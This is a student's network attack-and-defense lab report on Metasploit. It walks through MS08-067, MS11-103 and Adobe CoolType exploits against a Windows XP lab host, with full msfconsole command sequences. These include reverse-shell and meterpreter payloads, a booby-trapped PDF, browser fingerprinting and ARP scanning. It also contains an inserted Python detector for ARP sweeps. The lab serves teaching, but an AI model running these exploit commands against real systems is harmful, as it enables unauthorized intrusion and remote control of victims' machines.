20155328 Network attack and defense experiment 5: MSF basic application
Practice content and process records
1. Windows service penetration attack: ms08_067
Attacker: Kali
Target: WindowsXP (English version)
The first step is to check the IP addresses of the attacking machine and the target machine.
In the Kali terminal, enter msfconsole to open the msf console, then enter the following commands in sequence:
use exploit/windows/smb/ms08_067_netapi
show payloads
set payload generic/shell_reverse_tcp
set LHOST 192.168.127.138
set LPORT 5328
set RHOST 192.168.127.139
set target 0
exploit
If the attack is successful, you can see that the system information of the target machine has been obtained:
2. Browser penetration attack: ms11_103
Enter msfconsole in the Kali terminal to open the msf console and enter the following parameters:
On the attacked host, the webpage cannot be opened normally:
Back in Kali, enter the following commands:
sessions
sessions -i n // n is the highest session number displayed
It can be seen that the attack was successful.
3. Penetration attacks against Adobe Reader
Enter the msf console in kali and enter the following command:
use windows/fileformat/adobe_cooltype_sing
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.127.139
set LPORT 5328
set FILENAME 20155328.pdf
exploit
Generated PDF:
Copy the generated PDF to the target machine.
Back in Kali, enter the listener (handler) module with the following commands:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.127.139
set LPORT 5328
exploit
Then open the PDF on the target machine:
The attacking machine shows that the attack was successful:
4. Application of Aux auxiliary modules
1. browser_info
In the Kali terminal, enter show auxiliary to see which modules are available in aux, and finally select gather/browser_info.
After entering the msf console, enter the following commands in sequence:
use auxiliary/gather/browser_info
set SRVHOST 192.168.127.138 // Kali's IP
set SRVPORT 5328
exploit
You can see that the URL is generated and the server has started.
Copy the link and access it on the target machine (WindowsXP):
Back in Kali, you can see that the browser information of the target machine that accessed the URL has been obtained.
2. arp_sweep
First enter the following command in the kali terminal to manually create a database required by msf:
service postgresql start
msfdb start
Then enter msfconsole to open msf, enter the command use auxiliary/scanner/discovery/arp_sweep to enter the module, and set the parameters (RHOSTS is set to the network segment where Kali is located):
After setting them, enter run, and you can see that in addition to your own host IP, there are three other IPs:
In msf, enter the command db_nmap -O 192.168.127.139 (the target IP), and you can see the open port numbers and the target's operating system.
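Seen from the defending side, an arp_sweep run like the one above appears as a single host sending ARP requests for many distinct addresses within a short time. The following is an added example of that detection logic, not part of the original report; the window and threshold values, the MAC addresses and the sample capture are constructed assumptions.

```python
from collections import defaultdict, deque

WINDOW_SECONDS = 5.0    # assumed sliding-window length
DISTINCT_TARGETS = 20   # assumed number of distinct IPs queried per window

def detect_arp_sweeps(requests, window=WINDOW_SECONDS, threshold=DISTINCT_TARGETS):
    """requests: (timestamp, sender_mac, sender_ip, target_ip) tuples for ARP
    who-has frames, sorted by timestamp. Returns {sender_mac: first_alert_time}."""
    recent = defaultdict(deque)                      # mac -> (ts, target) in window
    counts = defaultdict(lambda: defaultdict(int))   # mac -> target -> hits in window
    alerts = {}
    for ts, mac, _sender_ip, target in requests:
        q, c = recent[mac], counts[mac]
        q.append((ts, target))
        c[target] += 1
        # Evict requests that have fallen out of the sliding window.
        while q and ts - q[0][0] > window:
            _, old = q.popleft()
            c[old] -= 1
            if c[old] == 0:
                del c[old]
        # Many distinct targets from one sender in one window looks like a sweep.
        if len(c) >= threshold and mac not in alerts:
            alerts[mac] = ts
    return alerts

def sample_capture():
    """Constructed data: one host sweeping the /24, one host behaving normally."""
    scanner = ("00:0c:29:aa:bb:01", "192.168.127.138")   # constructed MAC
    normal = ("00:0c:29:aa:bb:02", "192.168.127.139")    # constructed MAC
    rows = []
    for i in range(1, 255):   # one request per address, 10 ms apart
        rows.append((i * 0.01, scanner[0], scanner[1], f"192.168.127.{i}"))
    for i in range(30):       # normal host re-resolves two peers over a minute
        peer = "192.168.127.2" if i % 2 else "192.168.127.138"
        rows.append((i * 2.0, normal[0], normal[1], peer))
    return sorted(rows)

if __name__ == "__main__":
    for mac, ts in detect_arp_sweeps(sample_capture()).items():
        print(f"possible ARP sweep from {mac} at t={ts:.2f}s")
```

A slower sweep that stays under the threshold per window would not be flagged; widening the window trades that off against false positives from busy hosts such as gateways.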
Basic question answers
Explain what exploit, payload and encode are in your own words.
Exploit: Taking advantage of vulnerabilities or anything else that can be exploited to obtain user permissions, tamper with file information, etc.
Payload: A piece of code executed on the target machine, which can open a reverse connection.
Encode: Encoding the signature (feature code) so that the signature changes.
Practice summary and experience
This experiment mainly involved working with a number of small modules, and it felt good. Pretty awesome. Keep up the good work.